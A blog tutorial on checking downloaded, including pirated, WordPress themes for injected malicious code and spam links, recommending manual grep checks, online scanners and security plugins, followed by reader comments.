Scan and Clean WordPress Theme for Malicious Codes


If your WordPress blog isn’t secured nor has a loop hole, it can be hacked easily. To avoid this, always follow our WordPress security tips and hacks to make your WordPress blog bullet proof. If you own websites which doesn’t run under WordPress, then you can follow our guide on online tools to check virus / malware on websites that doesn’t run on WordPress. Bullet Proof WordPress plugin can help you to scan your WordPress site for exploits, malware, loop holes from XSS, Base64, SQL Injection hacks. So these are must have WordPress plugins for securing your blog.

WordPress self-hosted is open source software; there can be lot of loop holes. But the security team at WordPress is fixing those issues on regular intervals. If you analyze the major reason for all these “my blog is hacked, help me please” kind of issue is mainly because people don’t use the legal softwares, tools on the WordPress website. If you try to download WordPress themes illegally and use it, there are lots of chances that the WP theme which is uploaded by a random stranger on the internet can have malicious code and malware present inside the core WP theme files.

How to clean a nulled WP theme

I am not encouraging you to use Premium themes illegally by downloading it. (You should read the last paragraph about pirating WP themes). But, if you wanted to use, make sure your nulled WP theme is clean without any malicious code or malware present inside the core WP theme files. How to check/scan for malicious code inside WP theme files?

What kind of malicious code is there inside WP theme files? The person who is uploading can insert any kind of adult keyword linking back to his website, or upload set of codes to exploit your theme later when you upload it to your website, etc.

They can inject codes which are difficult to find. The codes aren’t like regular ones, they might be encrypted, and calling just the class name using PHP code and the original code might be present on some other WP theme file. So, here we are going to learn where the malicious codes always hide? Tools to check it out after installation and how to clean theme before you install the WordPress theme.

My method:

I usually test out any WP theme on my local host. So download the WP theme on your desktop and unzip it. Use wingrep or fgrep (depend if I am on Win or Linux box) to find: “mail(” and “eval(” strings. Checks this calls if exist and remove it.

Also I would suggest you to manually open all the files under WP Theme and scan line by line for any malicious codes calling any function or class outside WordPress. If you find any codes encrypted, you can use this online tool to decrypt PHP codes.

Manual method is always the best one. Now you can install it on your local host and check the files once again. Make sure they work properly and all the functions on the theme work perfectly.

WordPress Security Scanner

Sucuri security online tool scans your WordPress website for free. It scans your website for malware issues, malicious JavaScripts, malicious iFrames codes that are injected, suspicious redirection, spam, whether your website is blacklisted or not. Just enter your website URL and it will display all the information.

sucuri scanner

Scan WordPress for Malware

If you’re worried about malicious scripting on your websites, Unmask Parasites online tool exploits security vulnerabilities and hidden illicit content. Similar to Sucuri security tool, you need to enter your website address and it shows the external references such as JavaScripts, iFrame codes to the website whether they’re safe or not.

unmask pirtaes

You can perform additional test like if you want to reveal hidden spam links inside your website. As I said before, random strangers who upload WP themes on the internet might hide some of their website links with adult, drug keywords.

keyword injection

With the help of this tool, you can find whether your website is infected with these keywords stuffed inside.

Plugins to Check WordPress Infected with Malware

I will put down a list of WordPress plugins that can help you to clean nulled WP theme or any hacked theme.

Exploit Scanner

This plugin doesn’t prevent any hackers to enter your website. But it can find out the scripts and modified content that are left by the hackers. Some of the methods used to insert scripts are hide the code or spam links using CSS, hide text. So these kinds of things can be found out using this plugin.

Some hackers go a step further and bind the text or codes in your database. Spam links are sometimes added to blog posts and comments. They’re hidden by CSS so visitors don’t see them, but search engines do. This plugin searches for content that are changed in WP files and DB records.

Download the plugin

WordPress Antivirus

WP Antivirus plugin will scan for any malicious injections in your theme files. Not once, but automatically every day. Sometimes, you might have a perfect theme without any malicious code, but hackers try to inject code via a loop hole in your plugins directory. So this plugin daily scans all WP theme files and database tables. WP Antivirus

Theme Authenticity Checker (TAC)


This is what exactly we need. TAC stands for Theme Authenticity Checker. It searches the source files of every installed theme for signs of malicious code. If such code is found, it displays the path to the theme file, the line number, and a small snippet of the suspect code.

So I hope all these links will help you to enjoy malware free WP themes.

Note: If you’re using a free WP theme, don’t be happy. These days, hackers and strangers on the internet insert malicious codes in the free WP themes and upload it to the web. So what I suggest is, if you’re downloading a free WP theme, download it from the official WP theme repository. If you’re planning to get Premium WP theme, buy it legally from sites like themeforest, elegant themes, Woothemes etc. They’re the best in the market. Don’t PIRATE!

It takes just 10 seconds to pirate a WP theme, but do you know how many hours it takes to design a theme, code, debug and release its first version? So, Don’t PIRATE!

For a limited time I'm sharing some select Tips and Tricks and How-To Guides for FREE.


  1. A very nice tutorial. But it takes hours and even days of coding and testing a theme for the developer so he definitely deserves the price!
    I am confessing here that I have used 1 or 2 nulled themes in the past when I was new in blogosphere. But now I pay for the themes.

  2. Sunitha says:

    Oops ! Why i didn’t find this post before. I think i m not lucky as i have lost my big blog having 500+ posts and getting 2 million page views per month due to malware infection. One day i found my blog is infected with malware and i am not able to access the blog anyways. Infection is everywhere and each file of blog. Later on I have to delete all the files and do fresh installation. I lost my all post due to no backup.

  3. Mihir says:

    A really useful tutorial for new blogger like me. Although I was little confused of using a nulled theme, but now I am afraid of doing this. Thanks for the instructions about checking the themes and website.

  4. Very helpful post !

  5. very helpful, thank you :D

  6. everest9 says:

    Good post but i downloaded the plugin and scanned my wp database but the plugin does not remove any suspicious code, do you know any plugin that can automatically removes it

Speak Your Mind